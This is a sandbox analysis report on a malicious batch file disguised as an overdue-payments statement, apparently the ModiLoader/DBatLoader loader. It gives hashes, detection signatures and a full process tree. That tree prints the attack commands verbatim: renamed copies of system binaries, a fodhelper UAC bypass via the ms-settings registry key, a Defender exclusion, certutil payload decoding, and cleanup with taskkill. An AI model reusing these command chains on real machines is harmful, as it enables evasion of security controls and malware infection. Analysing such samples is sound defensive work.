Analysis

max time kernel: 144s
max time network: 121s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 25-03-2024 14:32

Static task: static1

Behavioral task: behavioral1
  Sample: Statement Of Account - Overdue Payments #94839540823489.bat
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: Statement Of Account - Overdue Payments #94839540823489.bat
  Resource: win10v2004-20240226-en
General

Target: Statement Of Account - Overdue Payments #94839540823489.bat
Size: 2.9MB
MD5: 0acc894a421b72f77d8f825865710ec4
SHA1: e51bfe768ece4a254a5f85c977fa65dfa963c3b8
SHA256: e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
SHA512: 4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
SSDEEP: 24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage 1 IoCs
resource: behavioral1/memory/1832-51-0x00000000031E0000-0x00000000041E0000-memory.dmp
yara_rule: modiloader_stage2
Executes dropped EXE 16 IoCs
pid   Process
3068  alpha.exe
2672  alpha.exe
2544  alpha.exe
2636  xkn.exe
2384  alpha.exe
2284  alpha.exe
2988  kn.exe
2232  alpha.exe
2128  kn.exe
1832  Lewxa.com
2596  alpha.exe
2476  alpha.exe
2616  alpha.exe
2692  alpha.exe
2768  alpha.exe
1852  alpha.exe
Loads dropped DLL 9 IoCs
pid   Process
2156  cmd.exe
2156  cmd.exe
2156  cmd.exe
2544  alpha.exe
2636  xkn.exe
2636  xkn.exe
2284  alpha.exe
780   WerFault.exe
780   WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid   pid_target  Process       procid_target
780   1832        WerFault.exe  43
Kills process with taskkill 2 IoCs
pid   Process
2196  taskkill.exe
1612  taskkill.exe
Modifies registry class 5 IoCs
description / ioc / Process
- Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell (reg.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open (reg.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " (reg.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command (reg.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings (reg.exe)
Modifies registry key 1 TTPs 1 IoCs
pid   Process
2400  reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid   Process
1832  Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
2636  xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
description              pid   Process
Token: SeDebugPrivilege  2636  xkn.exe
Token: SeDebugPrivilege  2196  taskkill.exe
Token: SeDebugPrivilege  1612  taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes

[1] C:\Windows\system32\cmd.exe (PID 2156)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe (PID 3016)
        cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\extrac32.exe (PID 2996)
            extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

    [2] C:\Users\Public\alpha.exe (PID 3068)
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\extrac32.exe (PID 2496)
            extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

    [2] C:\Users\Public\alpha.exe (PID 2672)
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\extrac32.exe (PID 2712)
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

    [2] C:\Users\Public\alpha.exe (PID 2544)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Public\xkn.exe (PID 2636)
            C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Users\Public\alpha.exe (PID 2384)
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\system32\reg.exe (PID 2400)
                    reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    - Modifies registry class
                    - Modifies registry key

    [2] C:\Users\Public\alpha.exe (PID 2284)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Public\kn.exe (PID 2988)
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
            - Executes dropped EXE

    [2] C:\Users\Public\alpha.exe (PID 2232)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Public\kn.exe (PID 2128)
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
            - Executes dropped EXE

    [2] C:\Users\Public\Libraries\Lewxa.com (PID 1832)
        C:\\Users\\Public\\Libraries\\Lewxa.com
        - Executes dropped EXE
        - Suspicious behavior: CmdExeWriteProcessMemorySpam

        [3] C:\Windows\SysWOW64\WerFault.exe (PID 780)
            C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 732
            - Loads dropped DLL
            - Program crash

    [2] C:\Users\Public\alpha.exe (PID 2596)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
        - Executes dropped EXE

    [2] C:\Users\Public\alpha.exe (PID 2476)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
        - Executes dropped EXE

    [2] C:\Users\Public\alpha.exe (PID 2616)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
        - Executes dropped EXE

    [2] C:\Users\Public\alpha.exe (PID 2692)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
        - Executes dropped EXE

    [2] C:\Users\Public\alpha.exe (PID 2768)
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\taskkill.exe (PID 2196)
            taskkill /F /IM SystemSettings.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Users\Public\alpha.exe (PID 1852)
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
        - Executes dropped EXE

        [3] C:\Windows\system32\taskkill.exe (PID 1612)
            taskkill /F /IM SystemSettingsAdminFlows.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
Downloads